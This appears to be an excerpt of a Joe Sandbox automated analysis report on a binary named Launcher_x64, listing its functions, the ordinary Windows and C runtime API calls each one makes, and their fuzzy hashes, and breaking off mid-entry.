Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8976114c354d3e03acf8cf3110918cd341446842cc7f154b1d340da402899d32
Instruction ID: 9df1fb0d9ee1bc25008e3c6b834cb4ef129d5ae0dbe0ada00b7fca8f5c774617
Opcode Fuzzy Hash: 8976114c354d3e03acf8cf3110918cd341446842cc7f154b1d340da402899d32
Instruction Fuzzy Hash: A6D06C32010608ABCF012FA1EC0995D3F6AEB89391B544024B9199A231CF7599929FB4

Function 00D7D3A4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D7D74E: GetConsoleOutputCP.KERNEL32(BFBEED24,00000000,00000000,?), ref: 00D7D7B1

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00D6D832,?,00D6DA94), ref: 00D7D529
GetLastError.KERNEL32(?,00D6D832,?,00D6DA94,?,00D6DA94,?,?,?,?,?,?,?,00000000,?,?), ref: 00D7D533

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: db1c0121cc33cb4c39119779573f171792c998934b78062a8c9da57e3abf6d25
Instruction ID: 63e1d03deb2fcc0007c92993e3a7cf993b0cf7557082b7a8ee88e7f97c8bc6a4
Opcode Fuzzy Hash: db1c0121cc33cb4c39119779573f171792c998934b78062a8c9da57e3abf6d25
Instruction Fuzzy Hash: 1D6194B1D00119AFDF11DFA8D884AEE7BBAEF49318F188145E948A7252E371D911CB71

Function 00D7DB7D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00D7D50F,?,00D6DA94,?,?,?,00000000), ref: 00D7DC19
GetLastError.KERNEL32(?,00D7D50F,?,00D6DA94,?,?,?,00000000,?,?,?,?,?,00D6D832,?,00D6DA94), ref: 00D7DC3F

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 2bdcd0344a7d4c33d102da07682fea40fc1cda4927331a900991a7b243f5fd4f
Instruction ID: 36ff188b99f058f1c8bc87c02524d338974b50937d76238cf258de9c4a9dc03a
Opcode Fuzzy Hash: 2bdcd0344a7d4c33d102da07682fea40fc1cda4927331a900991a7b243f5fd4f
Instruction Fuzzy Hash: 61217130A002189FCB19CF19DC809E9B7FAEF48305F1480A9E94AD7251E6309D42CF71

Function 00D77192 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00D77081,00D8FCD8,0000000C), ref: 00D771DE
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00D77081,00D8FCD8,0000000C), ref: 00D771F0

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 137cab357fcb32d3ee4ede96d72959c40c73ca4d3d0443a8aac9ab536251973f
Instruction ID: c5e89f5c09aae3b6085cac6062d340093332cac684a20084acb975245ca801cd
Opcode Fuzzy Hash: 137cab357fcb32d3ee4ede96d72959c40c73ca4d3d0443a8aac9ab536251973f
Instruction Fuzzy Hash: 7811B4316087414AC7308E3E8C886267A95A756370B3C4F5AE8BEC65F2E630D846D775

Function 00D62010 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00D62038
GetModuleFileNameW.KERNEL32 ref: 00D62058

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: Module$FileHandleName
String ID:
API String ID: 4146042529-0
Opcode ID: a512b74ccb9a9b36d61220deaee4743d8be649fa0a72545cca8a6baafd317195
Instruction ID: 2338be8c0bb8f64ee6b86f8c036411a76367363ba6df10ebd0ede51b1ade0b89
Opcode Fuzzy Hash: a512b74ccb9a9b36d61220deaee4743d8be649fa0a72545cca8a6baafd317195
Instruction Fuzzy Hash: A901ECB19043089FD715EF68D54569DBBF4FF48304F4144ADE489D3341EB745A888FA2

Function 00D756B7 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00D79A64,?,00000000,?,?,00D79704,?,00000007,?,?,00D7A04A,?,?), ref: 00D756CD
GetLastError.KERNEL32(?,?,00D79A64,?,00000000,?,?,00D79704,?,00000007,?,?,00D7A04A,?,?), ref: 00D756D8

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: e9080ac15d8eec3a9a453a1541a77d463776270b40dd176e04f87891ce287262
Instruction ID: 82c320681a03e2db7e753e88ac5fa7eb18bad4de3c493d51d1c75d1c1a03dbae
Opcode Fuzzy Hash: e9080ac15d8eec3a9a453a1541a77d463776270b40dd176e04f87891ce287262
Instruction Fuzzy Hash: 54E08C36200718ABDB112FA8FC09B8D7BA8EF40752F588025F60CC6260EB708860CBB5

Function 00D614C0 Relevance: 1.8, APIs: 1, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00D6150B

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: a22ec2d54a8d2018ebac477069ac589123a28952c2ac0297dc7b020655c9532f
Instruction ID: 5a505705c6d4bbc08fa017838bf53b7a365b0a9d5e882cc09df635a93101b7c0
Opcode Fuzzy Hash: a22ec2d54a8d2018ebac477069ac589123a28952c2ac0297dc7b020655c9532f
Instruction Fuzzy Hash: 83D1D278604B408FC724DF29C595A66BBE0FF48718B188A1DE8D78BBA1D735F904CB61

Function 00D68570 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dcf436de0086affbd44e47ae47af7727ad7e372c56b4d343894799576ec9e06
Instruction ID: 6ffcfa857a99488d167199c47e51f0eec4907c8134ff3d57f0347b844f8e12a6
Opcode Fuzzy Hash: 1dcf436de0086affbd44e47ae47af7727ad7e372c56b4d343894799576ec9e06
Instruction Fuzzy Hash: 94416071A0011AAFCF14DFA8C4509EDB7B9FF18314B584269E546E7680EB31E945EBB0

Function 00D7670D Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0e0c2d956c8e75facbf4b996802391ac10bb518d9f3ad1993e41f29ce97e30
Instruction ID: 52d3c951007802c183f8d8946446ac32f5950d58d0868aa09570aed9ee07048c
Opcode Fuzzy Hash: ca0e0c2d956c8e75facbf4b996802391ac10bb518d9f3ad1993e41f29ce97e30
Instruction Fuzzy Hash: E601B937610725AF9B059F68EC8191637A6F7C17A47288115F918C7694FB30DC109BF0

Function 00D756F1 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00D77675,?,?,00D77675,00000220,?,?,?), ref: 00D75723

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a02ba25e8dc9054a79c49bc6650220cb31249972e9e4d63b9d757ce0fd63e3df
Instruction ID: 2b433325a8d56fea1582dd1478ae2161fc3257219f3613cafb71df678cf91444
Opcode Fuzzy Hash: a02ba25e8dc9054a79c49bc6650220cb31249972e9e4d63b9d757ce0fd63e3df
Instruction Fuzzy Hash: 29E06535200A25D6EA256A65BC01B5B3658DF817F0F19C121FC4DD6198FFD0DC0181F2

Non-executed Functions

Function 00D80502 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00D80719

Strings

1#IND, xrefs: 00D80607
1#INF, xrefs: 00D80638
1#SNAN, xrefs: 00D8060E
1#QNAN, xrefs: 00D80615

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: bd669d6215554e12e635d0c04ddcd7e7c480ab396f2fbb628715600087972ea2
Instruction ID: 05e70c6f7178ebb6cfd14f0fdd44d3454c034c3da75391232b28d9d9d0087811
Opcode Fuzzy Hash: bd669d6215554e12e635d0c04ddcd7e7c480ab396f2fbb628715600087972ea2
Instruction Fuzzy Hash: E0D24D75E082298FDB64DF28DC407EAB7B9EB44305F1841EAD44DE7240EB74AE898F51

Function 00D7B1B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00D7AB6D,00000002,00000000,?,?,?,00D7AB6D,?,00000000), ref: 00D7B250
GetLocaleInfoW.KERNEL32(?,20001004,00D7AB6D,00000002,00000000,?,?,?,00D7AB6D,?,00000000), ref: 00D7B279
GetACP.KERNEL32(?,?,00D7AB6D,?,00000000), ref: 00D7B28E

Strings

OCP, xrefs: 00D7B20B
ACP, xrefs: 00D7B1D5

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 104557e406e8af8b90e8928730565bc8c50f6d6dd59493b34bc93898e2328cd0
Instruction ID: ad49d30e01a4e4d86c5439c32d2d6f1389a12d6cb51c74148564451106975f2d
Opcode Fuzzy Hash: 104557e406e8af8b90e8928730565bc8c50f6d6dd59493b34bc93898e2328cd0
Instruction Fuzzy Hash: 1021C422A02100AADB348F54C805B9F73A7AF54B34B5AC026E80EDB216F732DD40C778

Function 00D7AA37 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D7AB3F
IsValidCodePage.KERNEL32(00000000), ref: 00D7AB7D
IsValidLocale.KERNEL32(?,00000001), ref: 00D7AB90
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D7ABD8
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D7ABF3

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: bf0a0a2bea6dc38dd9371567bda3d378ebbffd9b2a44813376714506e90dcd0a
Instruction ID: e06a8d4d02587f620353ddd69fedfa8a7e3d78e66bc80585e358d1a7ec63fff4
Opcode Fuzzy Hash: bf0a0a2bea6dc38dd9371567bda3d378ebbffd9b2a44813376714506e90dcd0a
Instruction Fuzzy Hash: 3A5171B1A00219AFDB11DFA8CC45ABE73B9EF84700F088569E908E7191F770D944CB72

Function 00D73440 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction ID: e11eecbea5574055480e474f930a62a5d8ea565e96ba689ed594bd4078c99adf
Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction Fuzzy Hash: EC022EB1E012199BDF14CFA9C8806AEFBF1FF48314F148269E519E7341E731AA45DBA0

Function 00D7B799 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00D7B889
FindNextFileW.KERNEL32(00000000,?), ref: 00D7B97D
FindClose.KERNEL32(00000000), ref: 00D7B9BC
FindClose.KERNEL32(00000000), ref: 00D7B9EF

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 801167110db00bd50cfae73183633bc41ec84cc9cd2ce975b474f9eb2b9de21b
Instruction ID: a27731a8df10288f65147688b0229921d56446654edd4173388bea0d814b5c21
Opcode Fuzzy Hash: 801167110db00bd50cfae73183633bc41ec84cc9cd2ce975b474f9eb2b9de21b
Instruction Fuzzy Hash: F271A3719051586FDF20AF289C89BAEB7B8EF45310F5881DAE54DA7211FB314E849F70

Function 00D69A73 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D69A7F
IsDebuggerPresent.KERNEL32 ref: 00D69B4B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D69B64
UnhandledExceptionFilter.KERNEL32(?), ref: 00D69B6E

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: cbe7d31c04a57894dee06fb981df5a72526c8d01320c22f0f82a803aafe69e3d
Instruction ID: 7fdec92870f0d2781a78abc8879858e6f38e773c036cc1ab135d9c4411f21d82
Opcode Fuzzy Hash: cbe7d31c04a57894dee06fb981df5a72526c8d01320c22f0f82a803aafe69e3d
Instruction Fuzzy Hash: 9A31D775D053199BDB21EFA4D949BCDBBF8AF48300F1041EAE40DAB250EB719A848F55

Function 00D6A335 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D6A347
GetCurrentThreadId.KERNEL32 ref: 00D6A356
GetCurrentProcessId.KERNEL32 ref: 00D6A35F
QueryPerformanceCounter.KERNEL32(?), ref: 00D6A36C

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: faf9d3ccbc6641f872816f5800288b781c42454cafc434d674908ef3bbe879db
Instruction ID: bbf00d3dda957a98ff7d7e86c21c8e63d493014f009d73c495d5503a4446a4c7
Opcode Fuzzy Hash: faf9d3ccbc6641f872816f5800288b781c42454cafc434d674908ef3bbe879db
Instruction Fuzzy Hash: 94F06774D1020DEBCB00EBB4D94999EBBF4FF1D204B514995E412E7210E730A7449F51

Function 00D7AD30 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7AD84
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7ADCE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7AE94

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

